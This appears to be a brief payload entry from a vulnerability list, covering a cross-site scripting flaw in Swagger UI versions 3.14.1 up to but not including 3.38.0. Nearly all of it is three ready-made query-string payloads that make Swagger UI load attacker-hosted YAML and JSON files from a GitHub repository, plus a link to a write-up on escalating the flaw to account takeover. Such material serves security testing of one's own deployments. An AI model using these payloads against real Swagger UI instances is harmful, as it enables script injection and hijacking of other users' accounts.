- Swagger UI version affected:
>=3.14.1 < 3.38.0
?url=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/xss-domain.yaml
?url=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/xss-fetch.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
More info at: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/